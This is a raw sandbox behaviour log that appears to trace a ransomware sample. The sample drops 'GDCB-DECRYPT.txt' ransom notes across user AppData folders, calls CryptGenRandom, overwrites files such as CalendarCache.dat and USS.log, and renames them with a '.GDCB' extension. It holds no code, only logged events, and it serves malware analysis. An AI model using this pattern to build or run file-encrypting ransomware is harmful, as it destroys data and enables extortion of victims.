File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\TileDataLayer\Database\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\VirtualStore\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\CEF\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\CEF\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\CEF\User Data\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\CEF\User Data\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\CEF\User Data\Dictionaries\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Temp\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Temp\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Temp\CalendarCache.dat, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Temp\CalendarCache.dat, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Temp\CalendarCache.dat, size = 1048576, size_out = 20 True 1
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Temp\CalendarCache.dat, size = 32 True 1
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Temp\CalendarCache.dat, size = 256 True 2
Fn
Data
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Temp\CalendarCache.dat, size = 16 True 1
Fn
Data
File Move source_filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Temp\CalendarCache.dat, destination_filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Temp\CalendarCache.dat.GDCB True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Unistore\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Unistore\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USS.log, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USS.log, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USS.log, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Move source_filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USS.log, destination_filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USS.log.GDCB True 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USStmp.log, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USStmp.log, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
File Read filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USStmp.log, size = 1048576, size_out = 1048576 True 1
Fn
Data
File Move source_filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USStmp.log, destination_filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\UnistoreDB\USStmp.log.GDCB True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\CertificateTransparency\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\reports\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\settings.dat, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\settings.dat, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Cache\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\databases\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Rules\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension State\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extensions\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\IndexedDB\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\JumpListIcons\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\JumpListIconsOld\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Local Extension Settings\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Local Storage\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\previews_opt_out.db, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\previews_opt_out.db, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Service Worker\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Session Storage\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Sync Extension Settings\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Applications\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\EVWhitelist\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\FileTypePolicies\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\OriginTrials\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\PepperFlash\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\pnacl\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SSLErrorAssistant\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Subresource Filter\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SwReporter\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\WidevineCdm\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\CrashReports\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\History.IE5\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\History.IE5\MSHist012018012720180128\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\Low\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\Low\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\History\Low\History.IE5\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v2.0\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v2.0\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v2.0\UsageLogs\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v2.0\UsageLogs\WINPROJ.EXE.log, type = file_attributes False 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptGenRandom, address_out = 0x74cb0df0 True 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v2.0\UsageLogs\WINPROJ.EXE.log, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
File Create filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\\GDCB-DECRYPT.txt, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\\GDCB-DECRYPT.txt, size = 2774 True 1
Fn
Data
File Get Info filename = C:\Documents and Settings\CIiHmnxMn6Ps\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\ngen.log, type = file_attributes True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x74c90000 True 1
Fn
